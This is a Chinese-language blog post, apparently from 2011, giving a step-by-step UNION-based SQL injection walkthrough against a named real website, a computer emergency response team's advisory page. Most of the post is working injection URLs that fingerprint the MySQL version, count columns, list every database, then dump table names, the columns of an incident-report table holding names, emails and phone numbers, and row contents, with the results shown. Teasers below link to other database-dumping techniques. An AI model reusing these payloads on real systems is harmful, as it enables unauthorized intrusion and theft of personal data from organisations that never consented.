记暴库高级方法讲解

原创 2011年07月05日 21:39:39
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询

2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--

3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--

数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。

4.判断有没有写权限
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限

没办法,手动猜表啦


5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb

6.爆表,爆的是twcert库
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5


7.爆列名,这次爆的是irsys表
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status

8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--

返回是3,说明每个列里有3个地段

9.爆字段内容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
爆出name列的第一个字段的内容

http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
爆出name列的第二个字段的内容
版权声明:本文为博主原创文章,未经博主允许不得转载。

暴库漏洞

之前做过这样的教材,这个是文字说明,有兴趣的去搜索观看 SQL注入流行很久了,我们找漏洞注入目的无非是想得到数据库内的东西,比如用户名密码等,更进一步的MSSQL数据库还可以借此获得权限。基于A...
  • u010640023
  • u010640023
  • 2014年04月16日 00:52
  • 941

数据库暴库整理篇

来源:[jia219]  作者:[jia219]引子:昨天和animator试验了一下,把data.mdb文件改名为data.asp文件后放在wwwroot目录里。然后在IE中输入data.asp路径...
  • wuhongze
  • wuhongze
  • 2005年01月09日 14:34
  • 547

菜鸟也来学渗透——MySql暴库

http://www.2cto.com/Article/201305/212036.html 暴库之前看看MySql这些版本的特性吧 4.0以下不支持union查询 4.0以上m...
  • feier7501
  • feier7501
  • 2013年08月04日 14:10
  • 1387

%5c暴库原理

%5c暴库原理 作者:sasa 发布于:2012-5-21 20:26 Monday 分类:Web渗透         暴库有两个方法,第一个就是利用%5c,另外一个conn.asp暴库。而且...
  • eldn__
  • eldn__
  • 2012年12月07日 15:21
  • 3585

%5C暴库原理

暴库有两个方法,第一个就是利用%5c,另外一个conn.asp暴库。而且这里的暴库是针对access数据库的,而和access搭配的脚本一般是asp,因此出现暴库的一般为asp类型站点。   ASP...
  • mm569489205
  • mm569489205
  • 2016年07月24日 17:28
  • 693

ASP+ACCESS爆库原理和基本方法

ASP+ACCESS爆库原理和基本方法 2012-07-22 06:33:10 标签:的 是 入侵手段 用户名 文章 http://victims2012.blog.51cto.co...
  • kendyhj9999
  • kendyhj9999
  • 2014年01月27日 21:13
  • 1032

conn.asp暴库法原理及应用

conn.asp暴库,这个方法已经是个很老的方法了,它是通过直接访问数据库连接文件conn.asp使服务器产生错误,通过返回的错误信息从而暴出数据库的绝对路径,在这里conn.asp是指数据库连接文件...
  • gscaiyucheng
  • gscaiyucheng
  • 2013年12月11日 10:04
  • 2978

暴库整理篇

  • zgqtxwd
  • zgqtxwd
  • 2008年04月26日 17:43
  • 143

高级软件程序员养成记

原文链接:http://blog.sina.com.cn/s/blog_484dbef60100hr6b.html   假设你是一名软件专业毕业的本科学子,如何在工作中修炼成为一名有较高职业水准的...
  • scurry_st
  • scurry_st
  • 2016年04月11日 13:52
  • 636

tomcat 讲解 原理以及请求处理过程

本文以 Tomcat 5 为基础,也兼顾最新的 Tomcat 6 和 Tomcat 4。Tomcat 的基本设计思路和架构是具有一定连续性的。 Tomcat 总体结构 Tomcat 的结构...
  • zhousongyulove
  • zhousongyulove
  • 2016年04月01日 12:00
  • 296
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:记暴库高级方法讲解
举报原因:
原因补充:

(最多只允许输入30个字)